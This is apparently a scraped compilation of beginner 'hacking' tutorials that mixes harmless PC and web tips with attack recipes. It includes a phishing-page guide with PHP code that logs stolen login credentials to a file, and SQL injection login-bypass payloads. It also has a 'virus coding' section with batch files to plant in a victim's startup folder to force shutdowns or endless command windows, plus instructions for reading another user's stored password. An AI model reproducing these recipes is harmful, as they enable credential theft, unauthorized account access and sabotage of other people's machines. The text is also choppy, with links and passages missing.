    this: [Freeware] [Shareware] [Freeware] [Freeware] [Shareware]

     Make Phishing Page of any site
    Warning & Disclaimer:

    Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to
    show you, "How to create phishing page?". If you use this to hack anyone account, then we will
    not responsible for it. Do anything on your own risk.

    What is phishing page?

    A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In
    this, we just clone a site login or any other important page.

    How to create?

   Visit the page that you want to clone.
   Save it (CTRL+S) via your browser.
   Choose save complete webpage while saving it via browser.
   Give name index while saving. (Dont use other name!)
   Save it to a folder.
   Now, you should have one file named "index.htm" and a folder.
   We have to edit index.htm file.

   Edit it and search "action" without "". You will get something like this if you are creating fake
    page of facebook, action=""
    method="post" , We have to edit this line only. Change to login.php (How to create login.php is
    written below) and change post to get , and save it.

    How to create login.php?

    Here is the code for login.php, just copy the below code, paste it in notepad and save it as


    $handle = fopen("passes.txt", "a");
    foreach($_GET as $variable => $value)
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    fwrite($handle, "\r\n");

    You have to change to the site url that you are cloning, for example,
    change it to if you are cloning facebook.

    Now, you have your phishing page.

     META Tag Use
    Do you know why a developer/programmer use meta tags(<meta>)?
    Do you know its power and use?
    No?, but want to learn?, then you are at right place.

    Meta is a very powerful tag which we use for many purposes like for giving site description,
    keywords, author, etc, which search engines and peoples use to know about your site.
    Main and useful meta tags,

<meta name="Author" content="Hackalone">
<meta name="Generator" content="Hackalone">
<meta name="Description" content="Hackalone">
<meta name="Keywords" content="Hackalone">
Just add these lines in between head tag after modifying it, <head>...</head>, just change
content, i.e. in author change hackalone to your site name and in keywords, change hackalone to
your site keywords, like hacking, hackers, hacked, my site, yoursite, seperate by a comma
And all done.
Most search engines use meta tag to crawl your website, even google do so.

 Protect Data Using Software
As the name says, Protect Data Using Software i.e. Protect your important files using a software.
We will use winrar for this.
Download Winrar
Now download winrar and install it. Its a shareware but free to try for 45 days.
After installing winrar, follow these steps:

Right click on the folder or file which you want to protect.
Click on "Add to archive" option.
Go to the second "Advanced" tab.
Look up for an option "Set password".
Click on it.
You will see two option there, "Show password" and "Encrypt data".
Check both for maximum security.[Recommended][You may uncheck "Show password" option if
you are at public place]
Now, enter a good, large and rememberable password there.
And then press ok.
Now, you are at main wizzard again. Press ok and archive in now building up.
Now, open the created archive, it will ask for password and will not show any file or word
without password. You have a secured archive.

Winrar doesn't contain any backdoor, so no one can recover its password, not even winrar
developer(Developer said it to us).
Some important things to remember:
Use a strong password, use small, capital, number and symbol combination, if possible.Make sure
you have remembered your password otherwise your will completely lose your data, there is no
guarantee of password recovery.

We will not responsible if you will lose any data by setting any password. Do it on your own risk.
If you cant remember the password, write it down on a text file and save it somewhere in your
system, but it should be confidential.

 Proxy Servers
Proxy is nothing more than a server mirroring a webpage so you can see it without accessing the
website itself. This has many advantages. First of all, you have increased privacy. Servers usually

keep track of who visits them. Furthermore, it is possible to make a recopilation of all the
websites that you have ever visited. When using a proxy nobody will ever know what you visit
online. Proxies are capable of keeping you totally anonymous from hackers and logs.

Uses and benefits:

No one can trace you,
When you send an email, your ip also get sent with that email, proxy will prevent you,
Error Free,
With so many features, like remove scripts, images, etc.
And a lot more.

Some free and powerful proxies are:

Its free and fast.
*There are thousand of online proxy available on the interent, but we have just stated the best

 Prevention from Virus, Worm, & Trojan
As you all already know, you can prevent yourself from Virus, Worm, & Trojan by using an
antivirus or internet security or security program.
But I want to inform your some other ways to protect yourself.

Email is one of the common ways by which your computer can catch a virus. So it is always
recommended to stay away from SPAM. Open only those emails that has it?s origin from a trusted
source such as those which comes from your contact list. If you are using your own private email
host (other than gmail, yahoo, hotmail etc.) then it is highly recommended that you use good
anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted
Be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail
programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by
Mozilla), or a web-based program such as Hotmail or Yahoo (In Fire fox).
Never open any email attachments that come from untrusted sources. If it is a picture, text or
sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, ,
and .avi), you are probably safe, but still do a scan before opening.
As we all know, Internet is the main source of all the malicious programs including viruses,
worms, trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the
tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.

Don?t click on pop-up windows that announce a sudden disaster in your city or announce that
you?ve won an hourly prize. They are the ways to mislead Internet users and you should never
trust them. You can also use a pop-up blocker to automatically block those pop-ups.
USB thumb/pen drives are another common way by which viruses spread rapidly. So it is always a
good habit to perform a virus scan before copying any data onto your computer. NEVER double-

click the pen drive to open it. Instead right-click on it and select the option "open?. This is a safe
way to open a pen drive.
Most of us use search engines like Google to find what we are looking for. It is quite obvious for a
malicious website to get listed in the search results. So to avoid visiting those untrusted
malicious websites, you can download and install the AVG Link Scanner which is a freeware. This
tool can become very handy and will help you to stay away from malicious websites.
nstall a good Antispyware program that operates against Internet malware and spy ware.
Install good antivirus software and keep it updated. Also perform full system scan periodically. It
is highly recommended that you turn on the automatic update feature. This is the most essential
task to protect your PC from viruses. If PC security is your first option then it is recommended
that you go for shareware antivirus software over the free ones. Most of the antivirus supports
the Auto-Protect feature that provides real-time security for your PC. Make sure that this
feature is turned on.
Do not use disks that other people gave you, even from work. The disk could be infected with a
virus. Of course, you can run a virus scan on it first to check it out.
Set up your Windows Update to automatically download patches and upgrades. This will allow
your computer to automatically download any updates to both the operating system and Internet
Explorer. These updates fix security holes in both pieces of software.
While you download files from untrusted websites/sources such as torrents, warez etc. make sure
that you run a virus scan before executing them.

12-And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs
such as cracks, serials, warez etc. since they contribute much in spreading of viruses and other
malicious programs.
And, after all, you can use any one from this program for maximum security:

4.ESET Nod32.

We recommend kaspersky and its best, so i also recommend you kaspersky, you can trust on it, it
provides best high level security, and have powerful functions, like parental control, firewall,
safe run desktop and so many unique feature.

Never disable your security program and update it regularly.

You can also use autorun file remover this will prevent viruses, worm and trojan to spread on
your system.

 Phishing prevention
In this tutorial i will teach you the way you can protect your email id from getting hacked.
First at all, never click on any link which came with an untrusted source i.e. if you got a mail
from an unknown sender saying to click here, click above or similar to that, then never click!
it may get your IP address and can locate your physical location,
it may also get your password and may infect your system by viruses, worm or trojans.

But, what if a friend[Friend is a trusted source] try to hack your email id by phishing?

    If you clicked on a link and if you get redirected to a login page, then do these steps,
    1-Check the url, if its a login page of gmail, then the url should look like this and if its of yahoomail, then url should start with
    but, if url is different, then never login, its clearly a phishing page!

    2-When you open that type of page, dont forgot to see the certificate of that page, because a
    fake page never carry a certificate

    To view a site certificate click on the logo before the url(May be green in chrome and blue in
    firefox, it will show you the site certificate.)

    These are the two important measures which you should take to protect your email id.

     How to open My Computer from Run
    This may be look so hard but its not. Its just simple. Just follow the below steps:


   Click on Start and go to Run. (Win+r)
   Type "::{20d04fe0-3aea-1069-a2d8-08002b30309d}" without "quotes".
   Click OK or press Enter.
    Now, you are in the My Computer.

     How to open Recycle Bin from Run
    This may be look so hard but its not. Its just simple. Recently our one user asked to us, "How to
    open Recycle Bin from Run Command" then we decided to write this tutorial. Just follow the
    below steps:


   Click on Start and go to Run. (Win+r)
   Type "::{645FF040-5081-101B-9F08-00AA002F954E}" without "quotes".
   Click OK or press Enter.
    Now, you are in the recycle bin.

     Remote access & desktop sharing
Remote access and desktop sharing is very useful in today's world.
You may access your office computer by using your home computer and vice versa.
You may transfer files, can fix errors and can do anything. The remote system screen will appear
on your screen and you will have the power to control the remote system by using your mouse
and keyboard.
Its a magic.

Requirements: TeamViewer

License: Free for home users

Screenshot of main screen, more screenshots are

TeamViewer must be installed on both system i.e. system that you want to connect, for example,
install it on your home system as well as on your office system.
After download, install it and run it.
It will automatically generate an id and password for you.
Give it to your friend or anyone to fit it on remote system(Fill it in team viewer).
Now, as he will put this info, you will get connected. Now, you are ready to control it remotely.
Fix any error or solve any issue. Its all done, Enjoy remote access.

 Remove underline from hyperlink
As the name says, remove underline from a hyperlink!
Do you ever seen a hyperlink that is not underlined?
Want to remove underline from the hyperlink, then follow this way.

A hyperlink code look like this:
<a href="">hackalone</a>

You just have to add this, style="text-decoration:none" in that tag, do like this:-
<a href="" style="text-decoration:none">hackalone</a>

And, now save it, all done, the underline is now removed from the hyperlink.

 Select/Deselect all friends at once in
  facebook (Ask friends option)
Do you face problem when you want to invite your friends to an event of facebook or when you
ask a question on facebook? Because you have to select your friends one by one. Its not so
difficult if you have a few friends, but what if you get hundreds or thousands of friends?

    Impossible to select them manually and there is no option given by facebook for this. So, what
    you will do? Will you leave it? No chance! We found a way to make it possible. You can do it by
    using just a small javascript code. Its 100% safe and works with chrome. Get chrome and start
    using it.


    var x=document.getElementsByTagName("input");for(var i=0;i<x.length;i++) {if (x[i].type ==
    'checkbox') {x[i].click();}}; alert('Done [Hackalone Technologies(]');

    How to use code?

   Open and login to it using chrome.
   Ask a question or add an event and let the pop-up for select friend come. (To get that pop-up,
    click on the question and then on "Ask friends" option.)

   Copy the above code and go to your browser url, write "javascript:" without "quotes" and paste
    the code there. Do not give any space! (Pasting javascript: with the code directly to the brower
    url will not work in chrome, so do as instructed.)
   Now, hit enter.
   Your all friends are now selected. You just have to click on submit now. A pop-up will come
    confirming "Done [Hackalone Technologies(]".
   To deselect all friends, just paste the code with the same procedure and hit enter.

     Super Hide Folder and File
    By using this method, you can hide/unhide any file or folder. Even "Show hidden files" option of
    windows will not show it. But, hotlinking to that file in the system will work.

    Steps to hide:
   Go to Command Prompt (CMD)
   Then type the following code (Copy the code, right click at cmd window, then paste),
    attrib +s +h "Full path of folder"
    Change "Full path of folder" with your file path, for example:
    "C:\Users\H4CK3R\Desktop\hackalone.txt", i am hiding hackalone.txt.
   Now, hit enter and your file is now hidden.

    Steps to unhide:
   Go to Command Prompt (CMD)
   Then type the following code (Copy the code, right click at cmd window, then paste),

attrib -s -h "Full path of folder"
Change "Full path of folder" with your file path, for example:
"C:\Users\H4CK3R\Desktop\hackalone.txt", i am unhiding hackalone.txt.
Your file is back again. Please remember, both code are different. The sign are changed (+ is
changed into -). As i already said at the start, direct link to that file will open that file. For
example: hackalone.txt file is hidden but if you will paste this
C:\Users\H4CK3R\Desktop\hackalone.txt in my computer location bar and hit enter, this will open

Software Avaiable?

Yes, a software is also available for this. The name is "Protected Folder". This software is so
powerful and have the capacity to hide/unhide any file and folder on user request. This software
also block hotlinking to that file, which means no can get access to that file. This software comes
with inbuilt password protection, so no one can access locked files without password. Link to the
software's site:

 Submit your URL/Website to google
  and other search engines
Do you want to add your site to all popular search engines?
Do you want to see your site in google searches with best position?
Do you want to get more traffic to your site?
Then you are at the right place.

How to submit your site to Google:

First visit this url
Now, type your website url in the given field and fill the captcha code carefully and hit enter or
Congrats, your site has been submitted to google for crawling, now after some time, google

crawler, generally known as spider, will crawl your website and display in google searches.

Please note: This may take some time, may be from 1 day to 1 week, as we know, how busy
google really is.

How to submit your site to all search engines at once:

First visit this url,
Now, enter your website url in the given field and continue and it will ask you some more things,

like about your site, search keywords, etc just fill them carefully,(Keywords will directly affect
your site listing and search ranks, please be careful and choose good keywords),
Now, all done, your site has been submitted and will be crawled by all major and popular search

Please note: Crawling time of each search engine is differnet, so one may take 1 day while other
may take 1 month, so please wait and you will get approx 15 mails from addme, just read
everyone and you have to click on a link or follow some simple steps to complete your

Use a valid and working email address!

 SMS Forging
As the name says, "SMS forging" i.e. sending sms from any mobile number to any mobile number
in the world. It works with a mozilla firefox add-on, "Tamper data" and a site named "freesms8"
but its our bad luck, that site has fixed its loophole and now SMS forging is not working anymore.
We are trying to find another site and as we will find, we will update this tutorial again.

 Steganography
Steganography is the art and science of writing hidden messages in such a way that no one, apart
from the sender and intended recipient, suspects the existence of the message, a form of
security through obscurity. The word steganography is of Greek origin and means "concealed
writing" from the Greek words steganos meaning "covered or protected", and graphei meaning
"writing". The first recorded use of the term was in 1499 by Johannes Trithemius in his
Steganographia, a treatise on cryptography and steganography disguised as a book on magic.
Generally, messages will appear to be something else: images, articles, shopping lists, or some
other covertext and, classically, the hidden message may be in invisible ink between the visible
lines of a private letter.The advantage of steganography, over cryptography alone, is that
messages do not attract attention to themselves. Plainly visible encrypted messages?no matter
how unbreakable?will arouse suspicion, and may in themselves be incriminating in countries
where encryption is illegal.Therefore, whereas cryptography protects the contents of a message,
steganography can be said to protect both messages and communicating parties.Steganography
includes the concealment of information within computer files. In digital steganography,
electronic communications may include steganographic coding inside of a transport layer, such as
a document file, image file, program or protocol. Media files are ideal for steganographic
transmission because of their large size. As a simple example, a sender might start with an
innocuous image file and adjust the color of every 100th pixel to correspond to a letter in the
alphabet, a change so subtle that someone not specifically looking for it is unlikely to notice it.

Text steganography

Steganography can be applied to different types of media including text, audio, image and video
etc. However, text steganography is considered to be the most difficult kind of steganography
due to lack of redundancy in text as compared to image or audio but still has smaller memory
occupation and simpler communication. The method that could be used for text steganography is
data compression. Data compression encodes information in one representation into another
representation. The new representation of data is smaller in size. One of the possible schemes to
achieve data compression is Huffman coding. Huffman coding assigns smaller length codewords to
more frequently occurring source symbols and longer length codewords to less frequently
occurring source symbols.

 SQL Injection Attack
What is SQL Injection?
SQL Injection SQL injection is a technique that exploits a security vulnerability occurring in the
database layer of an application. The vulnerability is present when user input is either
incorrectly filtered for string literal escape characters embedded in SQL statements or user input
is not strongly typed and thereby unexpectedly executed. Web pages which accepts parameters
from user, and make SQL query to the database, are targeted. For Example, A web page with
username and password, fires SQL query on the database to check whether a user has entered
valid name and/or password or not. With SQL Injection, it is possible for us to send crafted user
name and/or password field that will change the SQL query and thus grant us something else.

What is Required?
1) Any Web Browser
2) Some Basic SQL (Structured Query Language) Queries such as 'SELECT', 'INSERT', 'UPDATE',
'DELETE', etc. along with their attributes (i.e Syntax).
What you should look for?
Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc.
Sometimes, HTML pages use POST command to send parameters to another ASP/ASPX page.
Therefore, you may not see the parameters in the URL. However, you can check the source code
of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some
HTML codes:

Everything between the
tags have potential parameters that might be useful.ORYou should look for pages like ASP, ASPX,
Try to look especially for URL that takes parameters, like:

Is it Vulnerable?
Start with a single quote trick. Input something like:
hi' or 1=1--
Into login, or password, or even in the URL. Example:
Login: hi' or 1=1--
Pass: hi' or 1=1--' or 1=1--

You can do this with a hidden field, just view the source HTML from the site, save it in your hard
disk, modify the URL and hidden field accordingly.
<FORM action= method=post>
<input type=hidden name=abc value="hi' or 1=1--">

If luck is on your side, you will get login without any login name or password.

But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:
In this URL 'category' is the variable name and 'sports' is it's value.
Here this request fires following query on the database in background.
SELECT * FROM search WHERE category='sports'
Where 'search' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category

Now, assume that we change the URL into something like this:' or 1=1--
Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database
something like:
SELECT * FROM search WHERE category='sports' or 1=1--'
The query should now select everything from the 'search' table regardless if category is equal to
'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last
hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also
may try
' or 'a'='a
It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:' or 1=1--

    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a

    Countermeasures ?
    Filter out character like ' " - / \ ; NULL, etc. in all strings from:
    * Input from users
    * Parameters from URL
    * Values from cookie

     Self Destructive Email
    "Self Destructive Email", (Mail which get deleted automatically after first read).
    Yes, i will teach you now "how to send a mail to a person which will get deleted automatically
    after its first read".
    Its magic of php. First of all, we will discuss about creating php script and sending the mail.

   You must have your own website(But, if not, then create a free one here ,
    its FREE!)
   You must save the file with .php extension.(This script will not work in any other document, like
    in html, or htm.)

    How to create php file?
   Open notepad and copy and paste the below code. Replace: Message that you want to show here!
    with your own custom message.

    <?php echo "Message that you want to show here!"; ?>

   Now, copy and paste the below code at the last of the document.(You must paste it at last of the

    <?php unlink(__FILE__); ?>

   Save it with any name you want but with .php extension.(Write name and then add .php and then
    select all files in the below option and save it.)
   Now, you have to upload that file to your site or webserver(Anyone, like you can do it with that
    account you created on 000webhost.)
   Now, open that file link in the url.

   You will see the message and now refresh the page, your page is now deleted.! And, you wont be
    able to see that message again.
   Just upload the file and send the link to the user, do not open it after upload or it will get
    deleted by you and all done, when the user will click on link and will read the message, it will
    get deleted. And the user will not able to read that message again.

    Self Destructive Mail Created!

   Please note that, DO NOT paste the above php code in your working website php scripts, the code
    will delete that file where it attached.
    We are not responsible if you loose any data by doing these steps. Do it on your own risk.

     Self Destructive Email
    As the name says, "Self Destructive Email" i.e. those email which get deleted automatically after
    first read is called self destructive email.

    Just visit here: Self Destructive Email, now register and send a self destructive email, it wil get
    deleted after the first read.

    This site gives points so after the end of your point just create a new id, its simple.

     Social Engineering
    This is a very simple hacking method, this works like this:

    First a hacker collects info about yourself, like birthday, birth place, mobile number, location,
    country, etc and hack your account by entering your personal details.
    Sometime, a hacker ask you so many questions rapidly and know your password.
    So, be smart and do not tell your personal info to anyone.
    Stay protected.!

     Torrent to direct download

    This tutorial is to teach you how to convert torrent download to direct http download. Its so
    simple. Just follow the steps carefully.
   Visit a torrent site and search a torrent that you want to download.
   Download .torrent file or just copy the magnet link.
   Visit
   Upload your downloaded .torrent file or paste the copied magnet link in
   Hit enter or press Go.
   Select/click Free.
   Wait for some time, a message will appear "caching completed" and download button will be
   Click on Download. Select/click free again.
   Now, download your file. If your file is compressed (zip, rar, etc), then you will get download
    immediately. But if not, then zbigz will first compress it and then it will give you download.

    Please remember, downloading torrent this way will give you slow download speed and you may
    not able to resume your downloads. Its better to use utorrent for downloading a torrent.

     Tata photon + Hack [Break Password]
    Are you a user of tata photon, someone locked it and you want to use internet but do not know
    the password, no such a big matter, its simple as drinking water!
    Break the password in these simple steps:-
    1. Goto C:\Program Files\Tata Photon+\Huawei\userdata [Installation folder]
    2. Then open UserSetting.xml
    3. It will look like this:

    <?xml version="1.0" encoding="UTF-8"?>


4.Now, see these lines:-


Here is your current password, see your password in this field
Very poor and hackable programming!

 Torrent World
Torrent is a peer-to-peer file sharing protocol used for distributing large amounts of data.
BitTorrent is one of the most common protocols for transferring large files, and it has been
estimated that it accounted for roughly 27% to 55% of all Internet traffic (depending on
geographical location) as of February 2009.

Clients: A BitTorrent client is any program that implements the BitTorrent protocol. Each client
is capable of preparing, requesting, and transmitting any type of computer file over a network,
using the protocol. A peer is any computer running an instance of a client.

Best torrent client: Utorrent Site

Seeders: A seeder is a peer that has an entire copy of the torrent and offers it for upload. The
more seeders there are, the better the chances of getting a higher download speed. If the seeder
seeds the whole copy of the download they should get faster downloads.

Leechers: A leech is a term with two meanings. Usually it is used to refer a peer who has a
negative effect on the swarm by having a very poor share ratio (downloading much more than
they upload). Most leeches are users on asymmetric internet connections and do not leave their
BitTorrent client open to seed the file after their download has completed. However, some
leeches intentionally avoid uploading by using modified clients or excessively limiting their
upload speed.The often used second meaning of leech is synonymous with downloader (see
above): used simply to describe a peer or any client that does not have 100% of the data. This
alternative meaning was mainly introduced by most BitTorrent tracker sites.

Best torrent sites:


How to download: To download a torrent, you need a torrent client. I recommend utorrent.
Download from here, Download utorrent. Install utorrent, now you are ready to download any
torrent. Visit the torrent site, search for something, open it and then click on "Download torrent"
or "Get torrent" or "Get this torrent" or "Magnet link". Download option will differ in differenet
sites. So, search for similar option. After clicking on download, you will get a torrent file, open
that torrent file or it will ask automatically. Choose the desired files and click on ok. Your file is
now being downloaded. But, if you have choosen "Get this torrent" option in thepiratebay, then it
will not give any torrent file because its a magnet link. After clicking on this magnet link,
utorrent will popup, in this you cant chooose your desired files. You have to download all files of
that torrent.

 Verify data by utorrent
What if you send a text file or any other file to your friend and your friend add something in it
and say its not your work?
I am going to teach you the way that you can use utorrent as a data verifier!
First of all, download utorrent from its homepage: Utorrent
Now, install it and run.
After that, go to file and then click on "create new torrent"
Now, a dialog box will open, asking file/folder location, trackers, webseeds, comment, piece
size, start seeding, preserve file order and private torrent.
In the file/folder, browse the file/folder.
In trackers, webseeds, comment: Leave them as it is.
In tick option, deselect piece size, preserve file order and private torrent.
Now, click on "create and save as"
Save the torrent to any location, [Desktop-Recommended]
Now, open the torrent file and insert it into utorrent and now check the lower portion then find
"Hash" and copy and paste the hash.

Save hash and send the file/folder to your friend.
And, all done, when someone claim that you its not your work, then just create a new torrent
infront of him and get the hash value again and compare with the older one, the hash value will
never change for that file/folder, if not edited.

Disclaimer: Hash value will change, if:
1.File/folder name change,
2.File/folder data change, [May someone add a space or commma in text file]
3.Any change made in the file/folder.

A Hash look like this: "C5779FAC8B1995F3E6ED91F9ED16FB43DE25513D"

 Virus Coding
Hi friends, can you code any virus with or without any software? No? But want to learn it?, then
you are at right place.
I will teach you to code a virus without any software.
Yes, i am not joking, its true, now we are going to learn virus coding by just some simple texts.
First open notepad, (win+r and now type notepad and hit enter), now type this command,

Code is in green color below:

c:\windows\system32\shutdown -l

for logoff, or,

c:\windows\system32\shutdown -r -f -t 00

for restart, or,

c:\windows\system32\shutdown -s -f -t 00

for shutdown,

start cmd.exe
goto x

to run cmd in infinite loop,

and save it with any name you want, for example hackalone.bat, use only one command per bat
Now, you have a virus.
The main work to do, place the virus to victim's system.
You have to copy and paste this virus to its right location,(This is the most important, if you wont
do it, it wont work and it is neutral now).
Open "My Computer" and write "startup" at the location/url bar and hit enter.
And, it will open system startup folder, paste bat file there.
And, now all done.
When the system get started, it will follow your given command.
Action will depend on your given command, like logoff, shutdown, or restart. You can test it
yourself, but read the how to restore your system first.

How to restore your system:
If your victim have low knowledge then he/she will format and reinstall its os to get rid of it, but
you can do it in just few seconds, just restart your system and at the boot screen type F8(Hold

it), and it will ask some options, like last known good configuation, etc you will find an option
there i.e. safe mode, start the system in safe mode and go the the system startup folder and
delete your bat file.

Extension: .bat

 Virus, Worm, & Trojan

A computer virus is a computer program that can copy itself and infect a computer. The term
"virus" is also commonly but erroneously used to refer to other types of malware, including but
not limited to adware and spyware programs that do not have the reproductive ability. A true
virus can spread from one computer to another (in some form of executable code) when its host
is taken to the target computer; for instance because a user sent it over a network or the
Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive.

Viruses can increase their chances of spreading to other computers by infecting files on a network
file system or a file system that is accessed by another computer.

As stated above, the term "computer virus" is sometimes used as a catch-all phrase to include all
types of malware, even those that do not have the reproductive ability. Malware includes
computer viruses, computer worms, Trojan horses, most rootkits, spyware, dishonest adware and
other malicious and unwanted software, including true viruses. Viruses are sometimes confused
with worms and Trojan horses, which are technically different. A worm can exploit security
vulnerabilities to spread itself automatically to other computers through networks, while a
Trojan horse is a program that appears harmless but hides malicious functions. Worms and Trojan
horses, like viruses, may harm a computer system's data or performance. Some viruses and other
malware have symptoms noticeable to the computer user, but many are surreptitious or simply
do nothing to call attention to themselves. Some viruses do nothing beyond reproducing


A computer worm is a self-replicating malware computer program, which uses a computer
network to send copies of itself to other nodes (computers on the network) and it may do so
without any user intervention. This is due to security shortcomings on the target computer.
Unlike a computer virus, it does not need to attach itself to an existing program. Worms almost
always cause at least some harm to the network, even if only by consuming bandwidth, whereas
viruses almost always corrupt or modify files on a targeted computer.


A Trojan horse, or Trojan, is a destructive program that masquerades as a benign application.

The software initially appears to perform a desirable function for the user prior to installation
and/or execution, but (perhaps in addition to the expected function) steals information or harms
the system. Unlike viruses or worms, Trojan horses do not replicate themselves, but they can be
just as destructive.

The term is derived from the Greek myth of the Trojan War, in which the Greeks give a giant
wooden horse to their foes, the Trojans, ostensibly as a peace offering. However, after the
Trojans drag the horse inside their city walls, Greek soldiers sneak out of the horse's hollow belly
and open the city gates, allowing their compatriots


Shared By:
Description: Hacking tools.